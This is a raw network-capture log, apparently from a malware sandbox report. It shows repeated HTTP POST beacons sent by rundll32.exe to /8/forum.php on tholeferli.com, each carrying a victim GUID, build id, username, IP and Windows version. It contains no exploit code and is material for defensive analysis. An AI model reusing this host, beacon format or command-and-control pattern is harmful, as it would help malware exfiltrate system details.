                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:07.469902992 CEST | 439 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:07.627796888 CEST | 439 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 59 42 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKYBPARRABw==0


                                                Session ID: 129 | Source IP: 192.168.2.22 | Source Port: 49296 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:07.902539015 CEST | 440 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:08.058758974 CEST | 440 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 47 54 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNGTMARRABw==0


                                                Session ID: 13 | Source IP: 192.168.2.22 | Source Port: 49180 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:08.731694937 CEST | 310 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:08.901592970 CEST | 310 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:08 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 4b 50 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHKPSARRABw==0


                                                Session ID: 130 | Source IP: 192.168.2.22 | Source Port: 49297 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:08.328980923 CEST | 441 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:08.485219002 CEST | 441 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:08 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMGTNARRABw==0


                                                Session ID: 131 | Source IP: 192.168.2.22 | Source Port: 49298 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:08.808880091 CEST | 442 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:08.978435040 CEST | 442 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:08 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTZAGARRABw==0


                                                Session ID: 132 | Source IP: 192.168.2.22 | Source Port: 49299 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:09.240680933 CEST | 443 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:10.409220934 CEST | 444 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:10 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 46 55 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJFUQARRABw==0


                                                Session ID: 133 | Source IP: 192.168.2.22 | Source Port: 49300 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:10.688029051 CEST | 444 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:10.859375954 CEST | 445 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:10 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 41 5a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKAZPARRABw==0


                                                Session ID: 134 | Source IP: 192.168.2.22 | Source Port: 49301 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:11.138365030 CEST | 445 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:11.305207014 CEST | 446 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:11 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 4e 4d 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQNMJARRABw==0


                                                Session ID: 135 | Source IP: 192.168.2.22 | Source Port: 49302 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:11.585130930 CEST | 447 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:12.743241072 CEST | 447 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:12 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZZAAARRABw==0


                                                Session ID: 136 | Source IP: 192.168.2.22 | Source Port: 49303 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:13.020370007 CEST | 448 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:13.177135944 CEST | 448 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:13 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZFUAARRABw==0


                                                Session ID: 137 | Source IP: 192.168.2.22 | Source Port: 49304 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:13.495186090 CEST | 449 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:13.650988102 CEST | 449 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:13 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 4d 4e 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNMNMARRABw==0


                                                Session ID: 138 | Source IP: 192.168.2.22 | Source Port: 49305 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:13.931045055 CEST | 450 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:14.099052906 CEST | 450 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:13 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMCXNARRABw==0


                                                Session ID: 139 | Source IP: 192.168.2.22 | Source Port: 49306 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:14.379228115 CEST | 451 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:14.550126076 CEST | 451 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:14 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZAZAARRABw==0


                                                Session ID: 14 | Source IP: 192.168.2.22 | Source Port: 49181 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:09.185193062 CEST | 311 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:09.357000113 CEST | 311 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:09 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 54 47 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYTGBARRABw==0


                                                Session ID: 140 | Source IP: 192.168.2.22 | Source Port: 49307 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:14.831377029 CEST | 452 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:14.989069939 CEST | 452 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:14 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 54 47 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJTGQARRABw==0


                                                Session ID: 141 | Source IP: 192.168.2.22 | Source Port: 49308 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:15.274631023 CEST | 453 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:15.430584908 CEST | 454 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 4a 51 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYJQBARRABw==0


                                                Session ID: 142 | Source IP: 192.168.2.22 | Source Port: 49309 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:15.704440117 CEST | 454 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:15.873754978 CEST | 455 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBZAYARRABw==0


                                                Session ID: 143 | Source IP: 192.168.2.22 | Source Port: 49310 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
